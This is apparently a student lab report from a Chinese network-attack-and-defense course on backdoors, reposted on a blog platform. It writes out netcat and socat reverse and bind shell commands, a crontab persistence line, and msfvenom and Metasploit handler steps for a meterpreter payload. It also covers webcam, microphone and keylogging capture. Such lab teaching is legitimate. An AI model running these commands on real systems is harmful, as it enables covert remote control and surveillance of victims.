文档章节

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

o
 osc_pyq23enu
发布于 2019/03/22 23:16
字数 1566
阅读 24
收藏 0

行业解决方案、产品招募中!想赚钱就来传!>>>

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

实验内容

1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

基础问题

  • 例举你能想到的一个后门进入到你系统中的可能方式? 答:收到以银行或者学校名义给你发过来的虚假邮件,打开邮件并且下载邮件的附件之后,后门程序可能会进入你的计算机。
  • 例举你知道的后门如何启动起来(win及linux)的方式? 答:通过修改注册表设置为开机自启动;进入挂马网站;下载一些有恶意程序绑定的软件。
  • Meterpreter有哪些给你映像深刻的功能? 答:可以不用通过用户登录来访问计算机,并且随意进行开启摄像头,录制音频等操作。
  • 如何发现自己有系统有没有被安装后门? 答:1.首先必须开启防火墙,而且防火墙对与某些危险操作的提示要仔细查看,不能疏忽。2.可以下载专业的杀毒软件(不要下载一些流氓软件如360),进行定期检查电脑。3.可以检测某些不常用的端口是否长时间开启,如果长时间开启说明电脑有一定的几率被植入了后门或者是病毒。

实验过程

1.使用netcat获取主机操作Shellcron启动

1.windows下获得一个linux shell

1.在Linux中使用ifconfig查看Linux的ip地址

2.在Windows中使用ipconfig查看本机ip地址 3.windows打开监听:ncat.exe -l -p 5235,Linux反弹连接win:nc 192.168.1.101 5235 -e /bin/sh,并且在Windows cmd下使用ls命令查看是否成功。

2.Linux 下获得Windows的cmd程序

1.Linux运行监听指令:nc -l -p 5235,Windows反弹连接Linux:ncat.exe -e cmd.exe 192.168.245.128 5235,在Linux shell下使用dir命令。

3.在Linux与Windows之间进行数据传送

1.Windows下监听端口:ncat.exe -l -p 5235,,Linux下连接到Windows的端口:ncat 192.168.1.101 5235,建立连接之后,就可以传输数据:

2.使用socat获取主机操作Shell, 任务计划启动

1.使用netcat获取主机操作Shell,cron启动

1.Windows中使用ncat.exe -l 5235监听5235端口 2.在linux中,使用crontab -e指令编辑一条定时任务,选择编辑器时选择3,在底行插入57 * * * * /bin/netcat 192.168.1.101 5235 -e /bin/sh(每个小时的第57分钟反向连接Windows的5235端口) 3.:wq保存退出配置即生效,可通过crontab -l查看: 4.在系统时间到57分钟,就会在Windows中监听的cmd中发现获得了Linux shell

2.使用socat获取主机操作Shell, 任务计划启动

1.win7系统中鼠标右击计算机:计算机管理->系统工具->任务计划程序->创建任务

2.常规中填写任务名称如:20165235 3.触发器-新建新建触发器,(按照图中步骤进行)

4.点击操作,将2操作所指的改为 启动程序.

5.导入socat.exe的路径,并添加参数:tcp-listen:5235 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5235,同时把cmd.exe的stderr重定向到stdout上)

6.创建完成之后,按Windows+L快捷键锁定计算机,再次打开,运行之前创建的任务。

7.在Linux shell中输入socat - tcp:192.168.1.101:5235

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=5235 -f exe > 20165235_backdoor.exe,生成后门程序20165235_backdoor.exe 2.在Windows中使用ncat.exe -lv5235 > 20165235_backdoor.exe 3.Linux中输入nc 192.168.1.101 5235 < 20165235_backdoor.exe。传输成功并且在Windows的ncat文件夹下查看后门程序。 4.再打开新的shell,并且使用msfconsole进入msf控制台: 5.输入use exploit/multi/handler: 6.使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp: 7.设置ip:set LHOST 192.168.245.128 9.设置端口:set LPORT 5235 10.使用exploit开始监听 11.在Windows cmd 中相应文件夹中执行:20165235_backdoor.exe,Linux获得Windows主机的连接,并且得到了远程控制的shell:

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.在以上的操作之上,使用record_mic可以截获一段音频: 2.使用webcam_snap可以使用摄像头拍照:

3.使用creenshot可以进行截屏:

4.使用keyscan_start 记录下击键的过程,使用keyscan_dump读取击键的记录:

实验中遇到的问题

1.错误一:在进行第一个实验时出现如下错误:

解决方法:在Linux使用ifconfig时出现很多地址,我很随意的填上去了一个,经过我仔细查看,将192.168.245.130写入运行成功。

2.错误:在使用crontab -e指令编辑一条定时任务时,发现win7端没有监听到Linux的shell

解决方法:因为在底部加入指令时没有将#取除掉。

实验总结与体会

通过本次实验我首先明白了什么是后门。(后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法)。同时也学会了后门的基本原理,按照学长学姐以及同学的博客的指导下完成实验,学会了使用多种后门工具,同时也学会了如何防范别人对计算机的后门植入。在以后的学习生活中要注意网上安全,留意恶意程序。本此实验也有一定的趣味性,在完成后门植入后会有些许的成就感。

o
粉丝 0
博文 500
码字总数 0
作品 0
私信 提问
加载中
请先登录后再评论。
Swift百万线程攻破单例(Singleton)模式

一、不安全的单例实现 在上一篇文章我们给出了单例的设计模式,直接给出了线程安全的实现方法。单例的实现有多种方法,如下面: class SwiftSingleton { } 这段代码的实现,在shared中进行条...

一叶博客
2014/06/20
3.4K
16
CSS编译工具--Peaches

Peaches是一个基于Node的CSS编译工具,用于自动合成CSS Sprite。 Peaches 追求简单、自然的CSS书写方式! 大致的工作原理如下: 1. 我们在书写样式时,对每个需要使用背景图片的元素,进行单...

sliuqin
2013/04/12
595
0
浏览器中的scheme解释器--SchemeScript

一个用javascript实现的scheme解释器,可以运行在浏览器中或node.js中。 刚刚看到编译原理与实践第二章,一时兴起,想写个以前就想写的scheme的解释器。昨天晚上开始写,到刚才为止,接近一天...

zoowii
2012/11/01
1.2K
0
SmartGWT学习整理 2、理解核心中的核心DataSource

SmartGWT学习整理 2、理解核心中的核心DataSource DataSource之所以重要,是因为它负责所有的与服务器的数据交互,几乎所有的控件都离不开它。 可以这样说,理解了DataSource就掌握了SmartGW...

st97
2010/11/16
2K
2
基于ExMobi的外卖系统全端开发实践

如今O2O模式已经进入高速发展阶段,这种模式带给人们的方便快捷不仅催生了各种团购业务,更使订餐、外卖这种传统行业得到了新生。 这不禁让笔者也蠢蠢欲动,尤其是现在企业内部很多时候为了方...

nandy007
2015/12/14
1.6K
11

没有更多内容

加载失败,请刷新页面

加载更多

以渠道身份为数据背书,悟空榜如何呈现最真实的市场声音?

文 | 曾响铃 来源 | 科技向令说(xiangling0815) 时至今日,电商节已经成为各巨头零售平台例行的活动,花样在不断创新,玩法也在不断涌现。 在这个过程中,伴随电商节的各种品牌、产品销量榜...

曾响铃
前天
0
0
川普宣布拉黑微信支付!腾讯市值一度蒸发5000亿,45天后跟鹅厂发生交易都属违法

郭一璞 发自 凹非寺 量子位 报道 | 公众号 QbitAI 轮到腾讯和微信了。 谁都没想到,川普针对中国企业的举措会进展的这么快,就在刚刚,白宫官方网站po出一条总统行政命令: Executive Order ...

Java旅途
昨天
0
0
图解浏览器安全(同源策略、XSS、CSRF、跨域、HTTPS、安全沙箱等串成糖葫芦)

关注公众号“执鸢者”,获取大量教学视频并进入专业交流群,回复“安全”获取本节思维导图。 一天小林又去面试啦,面试官说:“小林呀,你对浏览器安全了解多少?”。小林摸了摸头说,目前我...

执鸢者
昨天
0
0
《乘风破浪的姐姐》:内容营销研究报告

《乘风破浪的姐姐》节目表现 大盘:同期热播的综艺中,《乘风破浪的姐姐》全面领先 6月12号以来,同期热播的综艺节目《乘风破浪的姐姐》播映指数排名第一,整体热度相对靠前;好评度、观看度等...

OSC_BMKOlH
昨天
0
0
TikTok遭遇十面埋伏的BGM,是美国Z时代人的抗议声 | 一周之最

原本是来中国街头吃吃吃,积累了不少粉丝的老外博主郭杰瑞,不知是不是因为央视的连线,顺应时势地变成了时政UP主,因疫情回到美国后,一直带着口罩在街头做采访,满足中国网友各种好奇。 从...

紫金山科技
前天
0
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部